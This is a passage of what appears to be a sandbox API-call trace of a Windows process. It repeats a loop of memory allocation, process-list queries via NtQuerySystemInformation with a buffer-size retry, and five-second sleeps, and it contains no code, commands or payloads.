FreeType=0x8000) returned 0x0 [0251.587] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.589] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.589] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.590] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.590] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.590] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.593] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.594] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.595] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.596] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.596] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.596] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.597] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.600] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.601] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.602] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.602] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.603] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.603] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.603] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.607] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.607] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.609] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.609] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.610] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.610] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.610] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.614] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.614] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.616] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.616] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.617] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.617] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.617] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.620] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.620] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.623] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.623] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.623] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.624] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.624] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.628] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.629] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.631] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.631] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.632] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.632] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.632] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.636] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.637] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.638] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.638] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.639] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.639] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.640] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.643] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.644] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.646] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.646] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.647] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.647] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.647] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.650] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.651] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.652] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.653] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.653] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.653] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.654] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.657] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.658] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.660] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.660] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.661] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.661] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.661] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.664] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.665] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.667] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.667] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.667] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.668] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.668] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.671] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.672] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.673] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.674] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.675] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.675] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.675] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.682] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.683] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.685] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.686] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.686] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.686] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.689] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.690] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.692] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.692] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.693] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.693] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.693] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.698] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.698] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.700] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.701] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.701] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.701] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.701] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.705] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.705] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.707] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.707] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.708] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.708] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.708] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.712] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.712] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.714] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.714] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.715] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.715] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.715] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.719] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.719] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.724] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.724] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.725] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.725] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.725] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.730] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.731] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.732] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.732] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.732] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.733] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0251.733] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0251.736] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0251.737] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0251.738] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0251.738] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0251.739] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0251.739] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: 